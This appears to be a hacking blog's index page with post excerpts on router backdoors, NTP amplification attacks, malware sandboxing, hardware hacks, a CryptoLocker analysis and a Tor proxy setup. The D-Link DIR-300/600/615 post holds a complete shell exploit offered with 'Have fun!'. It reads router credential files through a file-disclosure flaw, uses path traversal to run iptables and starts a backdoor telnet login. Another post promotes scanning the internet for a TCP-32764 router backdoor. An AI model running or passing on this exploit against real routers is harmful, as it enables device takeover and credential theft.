[HOWTO] Searching the internet for the TCP-32764 netgear exploit

This is a backdoor from last month. You can find it in GitHub.
Here, i’ll describe a quick and dirty way to search the internet for this exploit.

This exploit allows complete control of the affected host. You can download/upload files, get a root shell, PPPoE credentials, admin password, etc.

The idea was originally posted here, however, the post didn’t described how to do it. So, i’ll post a very quick post on how to do it.

DISCLAIMER: educational purposes only. Use at your own risk. I only wrote the minimalist bash script and the how to.

Some more info from the author of the exploit.

Probable source of the backdoor:

Backdoor LISTENING ON THE INTERNET confirmed in :

  • Linksys WAG120N (@p_w999)
  • Netgear DG834B V5.01.14 (@domainzero)
  • Netgear DGN2000 1.1.1, 1.1.11.0, 1.3.10.0, 1.3.11.0, 1.3.12.0 (issue 44)
  • Netgear WPNT834 (issue 79)
  • OpenWAG200 maybe a little bit TOO open 😉 (issue 49)

Backdoor confirmed in:

Backdoor may be present in:

Continue reading “[HOWTO] Searching the internet for the TCP-32764 netgear exploit”

D-Link DIR-300, DIR-600, DIR-615 (fw 4.0) remote root exploit

This is a remote root exploit for D-Link wireless routers DIR-300 (all versions), DIR-600 (all versions), DIR-615 (fw 4.0).

Have fun!

#!/bin/sh

if [ -z "$1" ]; then
echo "d-link DIR-300 (all), DIR-600 (all), DIR-615 (fw 4.0)";
echo "exploited by AKAT-1, 22733db72ab3ed94b5f8a1ffcde850251fe6f466, c8e74ebd8392fda4788179f9a02bb49337638e7b";
echo "usage: $0 [router address] [telnet port]";
exit 0;
fi;

if [ -z "$2" ]; then
TPORT=3333;
else
TPORT=$2;
fi

UPORT=31337;

echo "Trying $1 ...";

HTTPASSWD=`curl -sS "<a href="http://%241/model/__show_info.php?REQUIRE_FILE=/var/etc/httpasswd%22" rel="nofollow">http://$1/model/__show_info.php?REQUIRE_FILE=/var/etc/httpasswd"</a>; | grep -A1 "&lt;center&gt;" | tail -1 |
sed -e "s/\t//g ; s/^\([^:]*\):\([^:]*\)$/\1\n \2/g"`;

if [ ! -z "$HTTPASSWD" ]; then
L=`echo $HTTPASSWD | cut -d' ' -f1`;
P=`echo $HTTPASSWD | cut -d' ' -f2`;

echo "found username: $L";
echo "found password: $P";

curl -d "ACTION_POST=LOGIN&amp;LOGIN_USER=$L&amp;LOGIN_PASSWD=$P" -sS "<a href="http://%241/login.php%22" rel="nofollow">http://$1/login.php"</a>; | grep -v "fail"
1&gt;/dev/null;

if [ $? -eq 0 ]; then
curl -sS
"<a href="http://%241/tools_system.xgi?random_num=2011.9.22.13.59.33&amp;exeshell=../../../../usr/sbin/iptables" rel="nofollow">http://$1/tools_system.xgi?random_num=2011.9.22.13.59.33&amp;exeshell=../../../../usr/sbin/iptables</a> -t nat -A PRE_MISC -i
eth0.2 -p tcp --dport $TPORT -j ACCEPT&amp;set/runtime/syslog/sendmail=1" 1&gt;/dev/null;
curl -sS
"<a href="http://%241/tools_system.xgi?random_num=2011.9.22.13.59.33&amp;exeshell=../../../../usr/sbin/iptables" rel="nofollow">http://$1/tools_system.xgi?random_num=2011.9.22.13.59.33&amp;exeshell=../../../../usr/sbin/iptables</a> -t nat -A PRE_MISC -i
eth0.2 -p tcp --dport $UPORT -j ACCEPT&amp;set/runtime/syslog/sendmail=1" 1&gt;/dev/null;
curl -sS
"<a href="http://%241/tools_system.xgi?random_num=2011.9.22.13.59.33&amp;exeshell=../../../../usr/sbin/telnetd" rel="nofollow">http://$1/tools_system.xgi?random_num=2011.9.22.13.59.33&amp;exeshell=../../../../usr/sbin/telnetd</a> -p $TPORT -l
/usr/sbin/login -u hacked:me&amp;set/runtime/syslog/sendmail=1" 1&gt;/dev/null;

echo "if you are lucky telnet is listening on $TPORT (hacked:me) ..."
curl -sS "<a href="http://%241/logout.php%22" rel="nofollow">http://$1/logout.php"</a>; 1&gt;/dev/null;
fi
fi

CHAP=`curl -sS "<a href="http://%241/model/__show_info.php?REQUIRE_FILE=/etc/ppp/chap-secrets%22" rel="nofollow">http://$1/model/__show_info.php?REQUIRE_FILE=/etc/ppp/chap-secrets"</a>; | grep -A1 "&lt;center&gt;" | sed -e
"s/&lt;center&gt;//g"`;

if [ ! -z "$CHAP" ]; then
echo "found chap-secrets: $CHAP";
fi

echo "Bye bye.";

exit 0;

NTP based DDoS attack – understanding NTP reflection

Behind a reflection attack

A reflection attack works when an attacker can send a packet with a forged source IP address. The attacker sends a packet apparently from the intended victim to some server on the Internet that will reply immediately. Because the source IP address is forged, the remote Internet server replies and sends data to the victim.

That has two effects: the actual source of the attack is hidden and is very hard to trace, and, if many Internet servers are used, an attack can consist of an overwhelming number of packets hitting a victim from all over the world.

But what makes reflection attacks really powerful is when they are also amplified: when a small forged packet elicits a large reply from the server (or servers). In that case, an attacker can send a small packet “from” a forged source IP address and have the server (or servers) send large replies to the victim.

Amplification attacks like that result in an attacker turning a small amount of bandwidth coming from a small number of machines into a massive traffic load hitting a victim from around the Internet. Until recently the most popular protocol for amplification attacks was DNS: a small DNS query looking up the IP address of a domain name would result in a large reply.

NTP DDoS Amplification Attack
NTP DDoS Amplification Attack

For DNS the amplification factor (how much larger a reply is than a request) is 8x. So an attacker can generate an attack 8x larger than the bandwidth they themselves have access to. For example, an attacker controlling 10 machines with 1Gbps could generate an 80Gbps DNS amplification attack.

In the past, we’ve seen one attack that used SNMP for amplification: it has a factor of 650x! Luckily, there are few open SNMP servers on the Internet and SNMP usually requires authentication (although many are poorly secured). That makes SNMP attacks relatively rare.

The new kid on the block today is NTP. Continue reading “NTP based DDoS attack – understanding NTP reflection”

Cuckoo Sandbox – A malware analysis system

Throw any suspicious file at it and in a matter of seconds Cuckoo will provide you back some detailed results outlining what such file did when executed inside an isolated environment.
Cuckoo is free Open Source software.

 

Cuckoo

 

 

Why does this matter?

Malware is the swiss-army knife of cybercriminals and any other adversary to your corporation or organization.

In these evolving times, detecting and removing malware artifacts is not enough: it’s vitally important to understand how they work and what they would do/did on your systems when deployed and understand the context, the motivations and the goals of a breach.

In this way you are able to more effectively understand the incident, respond to it and protect yourself for the future.

http://www.youtube.com/watch?v=720Vh3FaGN8

There are infinite other contexts where you might need to deploy a sandbox internally, from analyzing an internal breach to proactively scouting wildly distributed threats, collect actionable data and analyzing the ones actively targeting your infrastructure or products.

In any of these cases you’ll find Cuckoo to be perfectly suitable, incredibly customizable and well… free!

Head over to Cuckoo’s website to learn more: http://cuckoosandbox.org

Hacking Aux-IN to a car’s CD player

I’ve seen this a few times, and it’s a hack worth to share.

Many times, we found ourselves owning a car with a CD player, but no AUX-IN. Who uses CD’s these days, anyway? Noah decided to un-crapify his car audio on a 2001 Ford Focus.

The hack itself is pretty simple. Open up the unit, and you’ll find two separate modules: CD player, and radio/amplifier unit. Both are connected through a flex cable.

Taping the CD Player
Taping the CD Player

Noah was fortunate, since he had taps for each pin, so he didn’t had to solder directly on the plug’s pins. So, he identified ROUT, LOUT and a ground connection, soldered the pins, and he’s ready to go.
Since he tapped on the CD player’s pins, a CD must be inserted in order to trigger the input.
Easy as recording an audio CD without any tunes in int: plain old silence.

Similar hacks:

 

Reverse engineering a Hit Clip

You should read this excellent article on reverse engineering a Hit Clip.

Hit Clips were small cheap digital audio players that could play music off of little plastic cartridges.  The audio was mono, sounded terrible, and only included a 60 second sample of a single song.

Head over here for more: http://ch00ftech.com/2013/12/31/reverse-engineering-a-hit-clip/ .

Hacking MicroSD cards

You should read the latest on hacking MicroSD cards by Bunnie Studios (http://www.bunniestudios.com/blog/?p=3554).

Some points to consider:

  • Every card has a ARM microcontroller;
  • Flash is usually bad, but it doesn’t go to waste. a 16GB card with 80% bad flash can be sold as a 2GB one;
  • Remember number 1? It can allow arbitrary code execution.
MicroSD Card controller
MicroSD Card controller

 

 

Interested on reading more?

This is the whole write up – http://bunniefoo.com/bunnie/sdcard-30c3-pub.pdf – and here’s the whole video. Enjoy!

Decoding OWL CM130 wireless monitor signal

So, i have a OWL CM130 wireless energy monitor for keeping an eye on power consumption at home.
It’s a great little gadget, but also a very cheap one: i bought it a few years ago for around 30€ in eBay, but it won’t let me do anything with the data, other than display it.

The OWL CM130 kit
The OWL CM130 kit

These usually work in 433MHz band, and i happen to have a 433MHz AM receiver similar to this one:
http://ardumarket.com/en/transmisors/transmisor-rf-fs1000a-330-443mhz-arduino-pic-id19.html

And this is the pinout:

FS1000A 433MHz receiver and transmitter pinout
FS1000A 433MHz receiver and transmitter pinout

 

So, i thought “This is a no brainer”!

Continue reading “Decoding OWL CM130 wireless monitor signal”

CryptoLocker Ransomware

Background

In mid-September 2013, the Dell SecureWorks CTU(TM) research team observed a new ransomware malware family called CryptoLocker. Ransomware malware such as Reveton, Urausy, Tobfy, and Kovter has cost consumers considerable time and money over the past several years. Ransomware prevents victims from using their computer normally (e.g., by locking the screen) and uses social engineering to convince victims that failing to follow the malware authors’ instructions will lead to real-world consequences. These consequences, such as owing a fine or facing arrest and prosecution, are presented as being the result of a fabricated indiscretion like pirating music or downloading illegal pornography. Victims of these traditional forms of ransomware could ignore the demands and use security software to unlock the system and remove the offending malware. CryptoLocker changes this dynamic by aggressively encrypting files on the victim’s system and returning control of the files to the victim only after the ransom is paid.

Infection vector

The earliest CryptoLocker samples appear to have been released on the Internet on September 5, 2013. Details about this initial distribution phase are unclear, but it appears the samples were downloaded from a compromised website located in the United States, either by a version of CryptoLocker that has not been analyzed as of this publication, or by a custom downloader created by the same authors. Continue reading “CryptoLocker Ransomware”

[Tutorial] Your own private anonymizing proxy – Raspberry Pi / TOR based

This howto uses the Raspberry Pi as the base system (tutorial is based on Debian), and Tor as the SOCKS5 Proxy.

The Objective: be anonymous on the internet, using the Raspberry Pi as a transparent SOCKS 5 proxy.

I didn’t intended this to be a completely exhaustive tutorial, but i feel it’s complete enough for the novice user to follow.

As a bonus, i’ve added info on how to use Tor as a Socks Proxy for your iPhone/iPad – no need to jailbreak.

If in any doubt following this guide, please leave a comment!

Introduction

Sometimes, you need to anonymize yourself in the internet. Or you’re just paranoid and don’t want to be followed around.

Either way, a proxy is a great way to stay anonymous in the internet.

If you just want to browse around, you can download a full featured package with Tor, and its own stripped down version of Firefox called TorBrowser. There are versions for Linux, OS X, and Windows, and you’re ready to go.

But if you don’t want to install anything in every device you own, or you want to be anonymous on your iPhone or Android device, then, this tutorial is for you.

 

Continue reading “[Tutorial] Your own private anonymizing proxy – Raspberry Pi / TOR based”